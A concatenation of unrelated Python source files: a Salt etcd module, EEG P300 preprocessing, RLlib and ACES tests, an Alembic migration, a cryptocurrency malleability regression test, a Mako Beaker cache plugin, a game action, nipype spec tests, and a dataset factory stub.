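# Example of the structure ls_() returns (illustrative keys/values only):
#   salt myminion etcd.ls /path/to/dir/
#   -> {'/path/to/dir/': {'/path/to/dir/key1': 'value1',
#                         '/path/to/dir/subdir/': {}}}
# Directories are reported with a trailing '/' and an empty dict; plain keys map
# directly to their values.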
def rm_(key, recurse=False, profile=None):
'''
Delete a key from etcd
CLI Example:
salt myminion etcd.rm /path/to/key
salt myminion etcd.rm /path/to/key profile=my_etcd_config
salt myminion etcd.rm /path/to/dir recurse=True profile=my_etcd_config
'''
client = salt.utils.etcd_util.get_conn(__opts__, profile)
return client.delete(key, recursive=recurse)
def tree(path='/', profile=None):
'''
Recurse through etcd and return all values
CLI Example:
salt myminion etcd.tree
salt myminion etcd.tree profile=my_etcd_config
salt myminion etcd.tree /path/to/keys profile=my_etcd_config
'''
client = salt.utils.etcd_util.get_conn(__opts__, profile)
return salt.utils.etcd_util.tree(client, path)
|
py | b415c4bcd597a8713531a02226229631a3ce22d5 | from scipy import signal
import numpy as np
def transform(data, fs, num_rowscols, num_repeat, seconds_to_slice):
""" Given data imported from .mat, return the data in a format which is easy to use.
Args:
data (dict): The dictionary of importing .mat file.
fs (float): The sampling frequency.
num_rowscols (int): The sum of the numbers of rows and columns.
num_repeat (int): The number of times each character repeats.
        seconds_to_slice (int): The number of seconds to slice out as one data point after each intensification (stimulus flash).
Return:
dict:
if is_training:
{
'signal': [num_characters, num_times, num_intens, num_electrodes, points_per_intens]
                'code': [num_characters, num_times, num_intens], same meaning as 'StimulusCode'
                'label': [num_characters, num_times, num_intens], same meaning as 'StimulusType'
                'targetchar': [num_characters, ], same meaning as 'TargetChar' (not used during training).
}
else:
{
'signal'
'code'
}
"""
# data = _read_BCIIII_p300_mat(path)
# if true then it's training set else test set
if 'StimulusType' in data.keys():
is_training = True
else:
is_training = False
# Training: Signal, StimulusCode, StimulusType, TargetChar, Flashing
# Test: Signal, StimulusCode, Flashing
num_characters = data['Signal'].shape[0]
num_electrodes = data['Signal'].shape[2]
points_per_intens = int(fs * seconds_to_slice)
# The shape of return I want
signal = np.zeros([num_characters, num_repeat, num_rowscols, num_electrodes, points_per_intens])
code = np.zeros([num_characters, num_repeat, num_rowscols])
if is_training: # if true then it's training set else test set
label = np.zeros([num_characters, num_repeat, num_rowscols])
for character in range(num_characters):
# All electrodes start at the same time so pick 0 is fine
timepoints = _find_timepoints_1D(data['StimulusCode'][character, :]) # (12*15,)
timepoints = timepoints.reshape([-1, num_rowscols]) # (15,12)
for time in range(num_repeat):
for intens in range(num_rowscols):
start = timepoints[time, intens]
end = start + points_per_intens
sliced_signal = data['Signal'][character, start:end, :] # (end-start,64)
sliced_signal = sliced_signal.transpose([1, 0]) # (64,end-start)
signal[character, time, intens, :, :] = sliced_signal
code[character, time, intens] = data['StimulusCode'][character, start]
if is_training:
label[character, time, intens] = data['StimulusType'][character, start]
if is_training:
return {'signal': signal, 'code': code, 'label': label, 'targetchar': np.array(list(data['TargetChar'][0]))}
else:
return {'signal': signal, 'code': code}
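# Hedged usage sketch (added for illustration; the .mat file name and parameter
# values below are assumptions based on the BCI Competition III P300 paradigm,
# not part of the original module):
#
#   import scipy.io
#   raw = scipy.io.loadmat('Subject_A_Train.mat')   # hypothetical file name
#   out = transform(raw, fs=240, num_rowscols=12, num_repeat=15, seconds_to_slice=1)
#   out['signal'].shape   # -> (num_characters, 15, 12, num_electrodes, 240)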
def _find_timepoints_1D(single_stimulus_code):
"""
Find the indexes where the value of single_stimulus_code turn from zero to non_zero
single_stimulus_code : 1-D array
>>> _find_timepoints_1D([5,5,0,0,4,4,4,0,0,1,0,2,0])
array([ 0, 4, 9, 11])
>>> _find_timepoints_1D([0,0,1,2,3,0,1,0,0])
array([2, 6])
>>> _find_timepoints_1D([0,0,1,2,0,1])
array([2, 5])
>>> _find_timepoints_1D([5,0,0,1,2,5])
array([0, 3])
"""
    flag = True  # whether we have seen a 0 so far (i.e., ready to record the next onset)
timepoints = []
for index, timepoint in enumerate(single_stimulus_code):
if timepoint != 0 and flag:
timepoints.append(index)
flag = False
if timepoint == 0 and not flag:
flag = True
return np.array(timepoints)
def subsample(data_array, subsample_interval):
""" Subsample every points_per_sample points """
return data_array[..., 0::subsample_interval]
def __butter_bandpass(lowcut, highcut, fs, order=5):
nyq = 0.5 * fs
low = lowcut / nyq
high = highcut / nyq
b, a = signal.butter(order, [low, high], btype='band')
return b, a
def butter_bandpass_filter(data, lowcut, highcut, fs, order=5, axis=-1):
b, a = __butter_bandpass(lowcut, highcut, fs, order=order)
y = signal.lfilter(b, a, data, axis=axis)
return y
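# Hedged usage sketch (added for illustration; the sampling rate and band edges
# are illustrative assumptions, not values prescribed by this module):
#
#   raw = np.random.randn(64, 240)                                   # (electrodes, samples)
#   filtered = butter_bandpass_filter(raw, lowcut=0.1, highcut=20.0, fs=240, order=5)
#   decimated = subsample(filtered, subsample_interval=12)           # keep every 12th sample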
def standardize_along(data, axis):
mean = data.mean(axis=axis, keepdims=True)
std = data.std(axis=axis,keepdims=True)
return (data - mean) / std |
py | b415c4faadf46c396a9b72eb2ed08f60e0ada92e | import unittest
import ray
from ray.rllib.agents.a3c import A2CTrainer
from ray.rllib.execution.common import STEPS_SAMPLED_COUNTER, \
STEPS_TRAINED_COUNTER
from ray.rllib.utils.test_utils import framework_iterator
class TestDistributedExecution(unittest.TestCase):
"""General tests for the distributed execution API."""
@classmethod
def setUpClass(cls):
ray.init(num_cpus=4)
@classmethod
def tearDownClass(cls):
ray.shutdown()
def test_exec_plan_stats(ray_start_regular):
for fw in framework_iterator(frameworks=("torch", "tf")):
trainer = A2CTrainer(
env="CartPole-v0",
config={
"min_iter_time_s": 0,
"framework": fw,
})
result = trainer.train()
assert isinstance(result, dict)
assert "info" in result
assert "learner" in result["info"]
assert STEPS_SAMPLED_COUNTER in result["info"]
assert STEPS_TRAINED_COUNTER in result["info"]
assert "timers" in result
assert "learn_time_ms" in result["timers"]
assert "learn_throughput" in result["timers"]
assert "sample_time_ms" in result["timers"]
assert "sample_throughput" in result["timers"]
assert "update_time_ms" in result["timers"]
def test_exec_plan_save_restore(ray_start_regular):
for fw in framework_iterator(frameworks=("torch", "tf")):
trainer = A2CTrainer(
env="CartPole-v0",
config={
"min_iter_time_s": 0,
"framework": fw,
})
res1 = trainer.train()
checkpoint = trainer.save()
for _ in range(2):
res2 = trainer.train()
assert res2["timesteps_total"] > res1["timesteps_total"], \
(res1, res2)
trainer.restore(checkpoint)
# Should restore the timesteps counter to the same as res2.
res3 = trainer.train()
assert res3["timesteps_total"] < res2["timesteps_total"], \
(res2, res3)
if __name__ == "__main__":
import pytest
import sys
sys.exit(pytest.main(["-v", __file__]))
|
py | b415c6304f230b9f55cff04b9b5816738409e544 | """Tag mode migration.
Revision ID: f972b83f1baa
Revises: 4c9a81798173
Create Date: 2019-04-04 12:38:40.310048
"""
from alembic import op
import sqlalchemy as sa
import os
import sys
from sqlalchemy.orm.session import Session
# Set system path, so alembic is capable of finding the stickerfinder module
parent_dir = os.path.abspath(os.path.join(os.getcwd()))
sys.path.append(parent_dir)
from stickerfinder.models import Chat # noqa
from stickerfinder.enum import TagMode # noqa
# revision identifiers, used by Alembic.
revision = "f972b83f1baa"
down_revision = "4c9a81798173"
branch_labels = None
depends_on = None
def upgrade():
op.add_column("chat", sa.Column("tag_mode", sa.String(), nullable=True))
session = Session(bind=op.get_bind())
    # Migrate the old boolean tagging flags into the new tag_mode column
session.query(Chat).filter(Chat.fix_single_sticker).update(
{"tag_mode": TagMode.single_sticker.value}
)
session.query(Chat).filter(Chat.tagging_random_sticker).update(
{"tag_mode": TagMode.random.value}
)
session.query(Chat).filter(Chat.full_sticker_set).update(
{"tag_mode": TagMode.sticker_set.value}
)
op.drop_index("ix_chat_current_sticker_set_name", table_name="chat")
op.drop_constraint("chat_current_sticker_set_name_fkey", "chat", type_="foreignkey")
op.drop_column("chat", "current_sticker_set_name")
op.drop_constraint("only_one_action_check", "chat")
def downgrade():
op.add_column(
"chat",
sa.Column(
"current_sticker_set_name", sa.VARCHAR(), autoincrement=False, nullable=True
),
)
op.create_foreign_key(
"chat_current_sticker_set_name_fkey",
"chat",
"sticker_set",
["current_sticker_set_name"],
["name"],
onupdate="CASCADE",
ondelete="SET NULL",
)
op.create_index(
"ix_chat_current_sticker_set_name",
"chat",
["current_sticker_set_name"],
unique=False,
)
op.drop_column("chat", "tag_mode")
op.create_check_constraint(
"only_one_action_check",
"chat",
"""
(tagging_random_sticker IS TRUE AND fix_single_sticker IS FALSE AND full_sticker_set IS FALSE) OR \
(fix_single_sticker IS TRUE AND tagging_random_sticker IS FALSE AND full_sticker_set IS FALSE) OR \
(full_sticker_set IS TRUE AND tagging_random_sticker IS FALSE AND fix_single_sticker IS FALSE) OR \
(full_sticker_set IS FALSE AND tagging_random_sticker IS FALSE AND fix_single_sticker IS FALSE)
""",
)
|
py | b415c6f9006f1ca4657c595dac7fd065ae23a5e8 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# SPDX-License-Identifier: AMPAS
# Copyright Academy of Motion Picture Arts and Sciences
"""
Defines unit tests for *ACES* configuration.
"""
from __future__ import division
import hashlib
import os
import re
import shutil
import sys
import tempfile
import unittest
sys.path.append(os.path.abspath(
os.path.join(os.path.dirname(__file__), '..', '..')))
from aces_ocio.utilities import files_walker
from aces_ocio.generate_config import (
ACES_OCIO_CTL_DIRECTORY_ENVIRON,
generate_config)
__author__ = (
'Haarm-Pieter Duiker, Thomas Mansencal, Stephen Hill, Kevin Wheatley, '
'Joseph Goldstone')
__copyright__ = (
'Copyright (C) 2014-2021 Academy of Motion Picture Arts and Sciences')
__license__ = 'Academy of Motion Picture Arts and Sciences License Terms'
__maintainer__ = 'Academy of Motion Picture Arts and Sciences'
__email__ = '[email protected]'
__status__ = 'Production'
__all__ = ['REFERENCE_CONFIG_ROOT_DIRECTORY',
'HASH_TEST_PATTERNS',
'UNHASHABLE_TEST_PATTERNS',
'TestACESConfig']
# TODO: Investigate how the current config has been generated to use it for
# tests.
REFERENCE_CONFIG_ROOT_DIRECTORY = os.path.abspath(
os.path.join(os.path.dirname(__file__), '..', '..', '..'))
HASH_TEST_PATTERNS = ('\.3dl', '\.lut', '\.csp')
UNHASHABLE_TEST_PATTERNS = ('\.icc', '\.ocio')
class TestACESConfig(unittest.TestCase):
"""
Performs tests on the *ACES* configuration.
"""
def setUp(self):
"""
Initialises common tests attributes.
"""
self.__aces_ocio_ctl_directory = os.environ.get(
ACES_OCIO_CTL_DIRECTORY_ENVIRON, None)
assert self.__aces_ocio_ctl_directory is not None, (
'Undefined "%s" environment variable!' % (
ACES_OCIO_CTL_DIRECTORY_ENVIRON))
assert os.path.exists(self.__aces_ocio_ctl_directory) is True, (
'"%s" directory does not exists!' % (
self.__aces_ocio_ctl_directory))
self.maxDiff = None
self.__temporary_directory = tempfile.mkdtemp()
def tearDown(self):
"""
Post tests actions.
"""
shutil.rmtree(self.__temporary_directory)
@staticmethod
def directory_hashes(directory,
filters_in=None,
filters_out=None,
flags=0):
"""
        Recursively computes the hashes of the files within the given directory.
Parameters
----------
directory : str or unicode
Directory to compute the file hashes.
filters_in : array_like
Included patterns.
filters_out : array_like
Excluded patterns.
flags : int
Regex flags.
Returns
-------
dict
Directory file hashes.
"""
hashes = {}
for path in files_walker(directory,
filters_in=filters_in,
filters_out=filters_out,
flags=flags):
with open(path) as file:
digest = hashlib.md5(
re.sub('\s', '', file.read())).hexdigest()
hashes[path.replace(directory, '')] = digest
return hashes
def test_ACES_config(self):
"""
Performs tests on the *ACES* configuration by computing hashes on the
generated configuration and comparing them to the existing one.
"""
self.assertTrue(generate_config(self.__aces_ocio_ctl_directory,
self.__temporary_directory))
reference_hashes = self.directory_hashes(
REFERENCE_CONFIG_ROOT_DIRECTORY,
HASH_TEST_PATTERNS)
test_hashes = self.directory_hashes(
self.__temporary_directory,
HASH_TEST_PATTERNS)
self.assertDictEqual(reference_hashes, test_hashes)
        # Checking that unhashable files ('.icc', '.ocio') are generated.
unashable = lambda x: (
sorted([file.replace(x, '') for file in
files_walker(x, UNHASHABLE_TEST_PATTERNS)]))
self.assertListEqual(unashable(REFERENCE_CONFIG_ROOT_DIRECTORY),
unashable(self.__temporary_directory))
if __name__ == '__main__':
unittest.main()
|
py | b415c963a499e295bac292c9ce1e0d8d29c83f12 | #!/usr/bin/env python3
# Copyright (c) 2014-2015 The Bitcoin Core developers
# Copyright (c) 2015-2017 The Bitcoin Unlimited developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import test_framework.loginit
#
# Test proper accounting with an equivalent malleability clone
#
from test_framework.test_framework import TriponeTestFramework
from test_framework.util import *
import pdb
import traceback
class TxnMallTest(TriponeTestFramework):
def add_options(self, parser):
parser.add_option("--mineblock", dest="mine_block", default=False, action="store_true",
help="Test double-spend of 1-confirmed transaction")
def setup_network(self):
# Start with split network:
return super(TxnMallTest, self).setup_network(True)
def run_test(self):
# All nodes should start with 1,250 TONE:
starting_balance = 1250
for i in range(4):
assert_equal(self.nodes[i].getbalance(), starting_balance)
self.nodes[i].getnewaddress("") # bug workaround, coins generated assigned to first getnewaddress!
# Assign coins to foo and bar accounts:
self.nodes[0].settxfee(.001)
node0_address_foo = self.nodes[0].getnewaddress("foo")
fund_foo_txid = self.nodes[0].sendfrom("", node0_address_foo, 1219)
fund_foo_tx = self.nodes[0].gettransaction(fund_foo_txid)
node0_address_bar = self.nodes[0].getnewaddress("bar")
fund_bar_txid = self.nodes[0].sendfrom("", node0_address_bar, 29)
fund_bar_tx = self.nodes[0].gettransaction(fund_bar_txid)
assert_equal(self.nodes[0].getbalance(""),
starting_balance - 1219 - 29 + fund_foo_tx["fee"] + fund_bar_tx["fee"])
# Coins are sent to node1_address
node1_address = self.nodes[1].getnewaddress("from0")
# Send tx1, and another transaction tx2 that won't be cloned
txid1 = self.nodes[0].sendfrom("foo", node1_address, 40, 0)
txid2 = self.nodes[0].sendfrom("bar", node1_address, 20, 0)
# Construct a clone of tx1, to be malleated
rawtx1 = self.nodes[0].getrawtransaction(txid1,1)
clone_inputs = [{"txid":rawtx1["vin"][0]["txid"],"vout":rawtx1["vin"][0]["vout"]}]
clone_outputs = {rawtx1["vout"][0]["scriptPubKey"]["addresses"][0]:rawtx1["vout"][0]["value"],
rawtx1["vout"][1]["scriptPubKey"]["addresses"][0]:rawtx1["vout"][1]["value"]}
clone_raw = self.nodes[0].createrawtransaction(clone_inputs, clone_outputs)
# 3 hex manipulations on the clone are required
# manipulation 1. sequence is at version+#inputs+input+sigstub
posseq = 2*(4+1+36+1)
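        # (added note) Worked arithmetic for the offset above: version (4 bytes)
        # + input-count varint (1) + outpoint (32-byte txid + 4-byte vout = 36)
        # + empty scriptSig length stub (1) = 42 bytes = 84 hex characters, so the
        # 8 hex characters starting there hold the little-endian sequence field.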
seqbe = '%08x' % rawtx1["vin"][0]["sequence"]
clone_raw = clone_raw[:posseq] + seqbe[6:8] + seqbe[4:6] + seqbe[2:4] + seqbe[0:2] + clone_raw[posseq + 8:]
# manipulation 2. createrawtransaction randomizes the order of its outputs, so swap them if necessary.
# output 0 is at version+#inputs+input+sigstub+sequence+#outputs
# 40 TONE serialized is 00286bee00000000
pos0 = 2*(4+1+36+1+4+1)
hex40 = "00286bee00000000"
output_len = 16 + 2 + 2 * int("0x" + clone_raw[pos0 + 16 : pos0 + 16 + 2], 0)
if (rawtx1["vout"][0]["value"] == 40 and clone_raw[pos0 : pos0 + 16] != hex40 or
rawtx1["vout"][0]["value"] != 40 and clone_raw[pos0 : pos0 + 16] == hex40):
output0 = clone_raw[pos0 : pos0 + output_len]
output1 = clone_raw[pos0 + output_len : pos0 + 2 * output_len]
clone_raw = clone_raw[:pos0] + output1 + output0 + clone_raw[pos0 + 2 * output_len:]
# manipulation 3. locktime is after outputs
poslt = pos0 + 2 * output_len
ltbe = '%08x' % rawtx1["locktime"]
clone_raw = clone_raw[:poslt] + ltbe[6:8] + ltbe[4:6] + ltbe[2:4] + ltbe[0:2] + clone_raw[poslt + 8:]
# Use a different signature hash type to sign. This creates an equivalent but malleated clone.
# Don't send the clone anywhere yet
tx1_clone = self.nodes[0].signrawtransaction(clone_raw, None, None, "ALL|ANYONECANPAY")
assert_equal(tx1_clone["complete"], True)
# Have node0 mine a block, if requested:
if (self.options.mine_block):
self.nodes[0].generate(1)
sync_blocks(self.nodes[0:2])
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Node0's balance should be starting balance, plus 50TONE for another
# matured block, minus tx1 and tx2 amounts, and minus transaction fees:
expected = starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"]
if self.options.mine_block: expected += 50
expected += tx1["amount"] + tx1["fee"]
expected += tx2["amount"] + tx2["fee"]
assert_equal(self.nodes[0].getbalance(), expected)
# foo and bar accounts should be debited:
assert_equal(self.nodes[0].getbalance("foo", 0), 1219 + tx1["amount"] + tx1["fee"])
assert_equal(self.nodes[0].getbalance("bar", 0), 29 + tx2["amount"] + tx2["fee"])
if self.options.mine_block:
assert_equal(tx1["confirmations"], 1)
assert_equal(tx2["confirmations"], 1)
# Node1's "from0" balance should be both transaction amounts:
assert_equal(self.nodes[1].getbalance("from0"), -(tx1["amount"] + tx2["amount"]))
else:
assert_equal(tx1["confirmations"], 0)
assert_equal(tx2["confirmations"], 0)
# Send clone and its parent to miner
self.nodes[2].sendrawtransaction(fund_foo_tx["hex"])
txid1_clone = self.nodes[2].sendrawtransaction(tx1_clone["hex"])
# ... mine a block...
self.nodes[2].generate(1)
# Reconnect the split network, and sync chain:
connect_nodes(self.nodes[1], 2)
self.nodes[2].sendrawtransaction(fund_bar_tx["hex"])
self.nodes[2].sendrawtransaction(tx2["hex"])
self.nodes[2].generate(1) # Mine another block to make sure we sync
sync_blocks(self.nodes)
# Re-fetch transaction info:
tx1 = self.nodes[0].gettransaction(txid1)
tx1_clone = self.nodes[0].gettransaction(txid1_clone)
tx2 = self.nodes[0].gettransaction(txid2)
# Verify expected confirmations
assert_equal(tx1["confirmations"], -2)
assert_equal(tx1_clone["confirmations"], 2)
assert_equal(tx2["confirmations"], 1)
# Check node0's total balance; should be same as before the clone, + 100 TONE for 2 matured,
# less possible orphaned matured subsidy
expected += 100
if (self.options.mine_block):
expected -= 50
assert_equal(self.nodes[0].getbalance(), expected)
assert_equal(self.nodes[0].getbalance("*", 0), expected)
# Check node0's individual account balances.
# "foo" should have been debited by the equivalent clone of tx1
assert_equal(self.nodes[0].getbalance("foo"), 1219 + tx1["amount"] + tx1["fee"])
# "bar" should have been debited by (possibly unconfirmed) tx2
assert_equal(self.nodes[0].getbalance("bar", 0), 29 + tx2["amount"] + tx2["fee"])
# "" should have starting balance, less funding txes, plus subsidies
assert_equal(self.nodes[0].getbalance("", 0), starting_balance
- 1219
+ fund_foo_tx["fee"]
- 29
+ fund_bar_tx["fee"]
+ 100)
# Node1's "from0" account balance
assert_equal(self.nodes[1].getbalance("from0", 0), -(tx1["amount"] + tx2["amount"]))
if __name__ == '__main__':
TxnMallTest().main()
def Test():
t = TxnMallTest()
t.drop_to_pdb = True
triponeConf = {
"debug": ["net", "blk", "thin", "mempool", "req", "bench", "evict"], # "lck"
"blockprioritysize": 2000000 # we don't want any transactions rejected due to insufficient fees...
}
t.main(["--tmpdir=/ramdisk/test","--nocleanup","--noshutdown"], triponeConf, None) # , "--tracerpc"])
|
py | b415c9c3c7cfcd4f1438f857b93e05bd01a8ee66 | # ext/beaker_cache.py
# Copyright 2006-2019 the Mako authors and contributors <see AUTHORS file>
#
# This module is part of Mako and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Provide a :class:`.CacheImpl` for the Beaker caching system."""
from mako import exceptions
from mako.cache import CacheImpl
try:
from beaker import cache as beaker_cache
except:
has_beaker = False
else:
has_beaker = True
_beaker_cache = None
class BeakerCacheImpl(CacheImpl):
"""A :class:`.CacheImpl` provided for the Beaker caching system.
This plugin is used by default, based on the default
value of ``'beaker'`` for the ``cache_impl`` parameter of the
:class:`.Template` or :class:`.TemplateLookup` classes.
"""
def __init__(self, cache):
if not has_beaker:
raise exceptions.RuntimeException(
"Can't initialize Beaker plugin; Beaker is not installed."
)
global _beaker_cache
if _beaker_cache is None:
if "manager" in cache.template.cache_args:
_beaker_cache = cache.template.cache_args["manager"]
else:
_beaker_cache = beaker_cache.CacheManager()
super(BeakerCacheImpl, self).__init__(cache)
def _get_cache(self, **kw):
expiretime = kw.pop("timeout", None)
if "dir" in kw:
kw["data_dir"] = kw.pop("dir")
elif self.cache.template.module_directory:
kw["data_dir"] = self.cache.template.module_directory
if "manager" in kw:
kw.pop("manager")
if kw.get("type") == "memcached":
kw["type"] = "ext:memcached"
if "region" in kw:
region = kw.pop("region")
cache = _beaker_cache.get_cache_region(self.cache.id, region, **kw)
else:
cache = _beaker_cache.get_cache(self.cache.id, **kw)
cache_args = {"starttime": self.cache.starttime}
if expiretime:
cache_args["expiretime"] = expiretime
return cache, cache_args
def get_or_create(self, key, creation_function, **kw):
cache, kw = self._get_cache(**kw)
return cache.get(key, createfunc=creation_function, **kw)
def put(self, key, value, **kw):
cache, kw = self._get_cache(**kw)
cache.put(key, value, **kw)
def get(self, key, **kw):
cache, kw = self._get_cache(**kw)
return cache.get(key, **kw)
def invalidate(self, key, **kw):
cache, kw = self._get_cache(**kw)
cache.remove_value(key, **kw)
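# Hedged usage sketch (added for illustration; not part of the original module).
# Mako selects this backend through the ``cache_impl`` argument mentioned in the
# class docstring above, with caching enabled per-template:
#
#   from mako.template import Template
#   t = Template("<%page cached='True'/>hello", cache_impl='beaker')
#   t.render()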
|
py | b415ca44047ba452abe2b0c30c33eeda738b5b61 | # coding: utf-8
import dataclasses
import random
import typing
import serpyco
from guilang.description import Description
from guilang.description import Part
from guilang.description import Type
from rolling.action.base import CharacterAction
from rolling.action.base import get_character_action_url
from rolling.action.utils import check_common_is_possible
from rolling.action.utils import fill_base_action_properties
from rolling.exception import ImpossibleAction
from rolling.exception import RollingError
from rolling.rolling_types import ActionType
from rolling.server.link import CharacterActionLink
from rolling.util import quantity_to_str
if typing.TYPE_CHECKING:
from rolling.model.character import CharacterModel
from rolling.game.base import GameConfig
@dataclasses.dataclass
class SearchMaterialModel:
ap: typing.Optional[float] = serpyco.number_field(cast_on_load=True, default=None)
class SearchMaterialAction(CharacterAction):
input_model = SearchMaterialModel
input_model_serializer = serpyco.Serializer(SearchMaterialModel)
@classmethod
def get_properties_from_config(cls, game_config: "GameConfig", action_config_raw: dict) -> dict:
properties = fill_base_action_properties(cls, game_config, {}, action_config_raw)
for produce in action_config_raw["produce"]:
if "resource" not in produce and "stuff" not in produce:
raise RollingError(
"Misconfiguration for action SearchMaterialAction (produce "
f"must contain stuff or resource key ({action_config_raw})"
)
if "quantity_per_hour" not in produce or "random_loss" not in produce:
raise RollingError(
"Misconfiguration for action SearchMaterialAction (produce "
f"must contain quantity_per_hour or random_loss key ({action_config_raw})"
)
properties.update({"produce": action_config_raw["produce"]})
return properties
def check_is_possible(self, character: "CharacterModel") -> None:
check_common_is_possible(self._kernel, character=character, description=self._description)
def check_request_is_possible(
self, character: "CharacterModel", input_: SearchMaterialModel
) -> None:
self.check_is_possible(character)
if input_.ap and character.action_points < input_.ap:
raise ImpossibleAction(f"{character.name} ne poss_de pas assez de points d'actions")
def get_character_actions(
self, character: "CharacterModel"
) -> typing.List[CharacterActionLink]:
return [
CharacterActionLink(
name=self._description.name,
link=get_character_action_url(
character_id=character.id,
action_type=ActionType.SEARCH_MATERIAL,
action_description_id=self._description.id,
query_params={},
),
cost=self.get_cost(character),
group_name="Chercher du matériel",
)
]
def perform(self, character: "CharacterModel", input_: SearchMaterialModel) -> Description:
if not input_.ap:
return Description(
title=self._description.name,
items=[
Part(
is_form=True,
form_values_in_query=True,
form_action=get_character_action_url(
character_id=character.id,
action_type=ActionType.SEARCH_MATERIAL,
query_params=self.input_model_serializer.dump(input_),
action_description_id=self._description.id,
),
items=[
Part(
label=f"Y passer combien de temps (PA) ?",
type_=Type.NUMBER,
name="ap",
)
],
)
],
)
ap_spent = input_.ap
zone_state = self._kernel.game.world_manager.get_zone_state(
world_row_i=character.world_row_i, world_col_i=character.world_col_i
)
found: typing.List[typing.Tuple[str, float]] = []
for produce in self._description.properties["produce"]:
resource_id = produce["resource"]
quantity_per_hour = produce["quantity_per_hour"]
random_loss = produce["random_loss"]
quantity_found = ap_spent * quantity_per_hour
# FIXME BS NOW: bonus with action config skill ?
quantity_found = quantity_found - (
quantity_found * random.randint(0, random_loss) / 100
)
# Test if zone contain absolute resource
if zone_state.is_there_resource(
resource_id, check_from_absolute=True, check_from_tiles=False
):
zone_state.reduce_resource(resource_id, quantity_found, commit=False)
# Test if zone contain resource in some tile
elif zone_state.is_there_resource(
resource_id, check_from_absolute=False, check_from_tiles=True
):
zone_geography = zone_state.zone_map.source.geography
extract_from_row_i, extract_from_col_i = zone_geography.get_random_tile_position_containing_resource(
resource_id, self._kernel
)
zone_state.reduce_resource_from_tile(
resource_id,
quantity_found,
tile_row_i=extract_from_row_i,
tile_col_i=extract_from_col_i,
commit=False,
)
else:
continue
found.append((resource_id, quantity_found))
self._kernel.resource_lib.add_resource_to(
character_id=character.id,
resource_id=resource_id,
quantity=quantity_found,
commit=False,
)
parts: typing.List[Part] = []
self._kernel.character_lib.reduce_action_points(
character_id=character.id, cost=input_.ap, commit=False
)
self._kernel.server_db_session.commit()
for resource_id, quantity in found:
resource_description = self._kernel.game.config.resources[resource_id]
quantity_str = quantity_to_str(quantity, resource_description.unit, self._kernel)
parts.append(Part(text=f"{quantity_str} de {resource_description.name}"))
return Description(
title="Vous avez récupéré",
items=parts,
footer_links=[
Part(is_link=True, go_back_zone=True, label="Retourner à l'écran de déplacements")
],
)
|
py | b415ca8353d378ecdedfdf142d112e73b4d9fc38 | # AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from nipype.testing import assert_equal
from nipype.interfaces.fsl.dti import ProbTrackX2
def test_ProbTrackX2_inputs():
input_map = dict(args=dict(argstr='%s',
),
avoid_mp=dict(argstr='--avoid=%s',
),
c_thresh=dict(argstr='--cthr=%.3f',
),
colmask4=dict(argstr='--colmask4=%s',
),
correct_path_distribution=dict(argstr='--pd',
),
dist_thresh=dict(argstr='--distthresh=%.3f',
),
distthresh1=dict(argstr='--distthresh1=%.3f',
),
distthresh3=dict(argstr='--distthresh3=%.3f',
),
environ=dict(nohash=True,
usedefault=True,
),
fibst=dict(argstr='--fibst=%d',
),
fopd=dict(argstr='--fopd=%s',
),
force_dir=dict(argstr='--forcedir',
usedefault=True,
),
fsamples=dict(mandatory=True,
),
ignore_exception=dict(nohash=True,
usedefault=True,
),
inv_xfm=dict(argstr='--invxfm=%s',
),
loop_check=dict(argstr='--loopcheck',
),
lrtarget3=dict(argstr='--lrtarget3=%s',
),
mask=dict(argstr='-m %s',
mandatory=True,
),
meshspace=dict(argstr='--meshspace=%s',
),
mod_euler=dict(argstr='--modeuler',
),
n_samples=dict(argstr='--nsamples=%d',
usedefault=True,
),
n_steps=dict(argstr='--nsteps=%d',
),
network=dict(argstr='--network',
),
omatrix1=dict(argstr='--omatrix1',
),
omatrix2=dict(argstr='--omatrix2',
requires=['target2'],
),
omatrix3=dict(argstr='--omatrix3',
requires=['target3', 'lrtarget3'],
),
omatrix4=dict(argstr='--omatrix4',
),
onewaycondition=dict(argstr='--onewaycondition',
),
opd=dict(argstr='--opd',
usedefault=True,
),
os2t=dict(argstr='--os2t',
),
out_dir=dict(argstr='--dir=%s',
genfile=True,
),
output_type=dict(),
phsamples=dict(mandatory=True,
),
rand_fib=dict(argstr='--randfib=%d',
),
random_seed=dict(argstr='--rseed',
),
s2tastext=dict(argstr='--s2tastext',
),
sample_random_points=dict(argstr='--sampvox',
),
samples_base_name=dict(argstr='--samples=%s',
usedefault=True,
),
seed=dict(argstr='--seed=%s',
mandatory=True,
),
seed_ref=dict(argstr='--seedref=%s',
),
simple=dict(argstr='--simple',
usedefault=False,
),
step_length=dict(argstr='--steplength=%.3f',
),
stop_mask=dict(argstr='--stop=%s',
),
target2=dict(argstr='--target2=%s',
),
target3=dict(argstr='--target3=%s',
),
target4=dict(argstr='--target4=%s',
),
target_masks=dict(argstr='--targetmasks=%s',
),
terminal_output=dict(mandatory=True,
nohash=True,
),
thsamples=dict(mandatory=True,
),
use_anisotropy=dict(argstr='--usef',
),
verbose=dict(argstr='--verbose=%d',
),
waycond=dict(argstr='--waycond=%s',
),
wayorder=dict(argstr='--wayorder',
),
waypoints=dict(argstr='--waypoints=%s',
),
xfm=dict(argstr='--xfm=%s',
),
)
inputs = ProbTrackX2.input_spec()
for key, metadata in input_map.items():
for metakey, value in metadata.items():
yield assert_equal, getattr(inputs.traits()[key], metakey), value
def test_ProbTrackX2_outputs():
output_map = dict(fdt_paths=dict(),
log=dict(),
lookup_tractspace=dict(),
matrix1_dot=dict(),
matrix2_dot=dict(),
matrix3_dot=dict(),
network_matrix=dict(),
particle_files=dict(),
targets=dict(),
way_total=dict(),
)
outputs = ProbTrackX2.output_spec()
for key, metadata in output_map.items():
for metakey, value in metadata.items():
yield assert_equal, getattr(outputs.traits()[key], metakey), value
|
py | b415cc50743bbc135a4f41d77b63a2768a7ff897 | # --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
"""Factory method for easily getting imdbs by name."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# print('1\n')
__sets = {}
from .pascal_voc import pascal_voc
# from lib.datasets.coco import coco
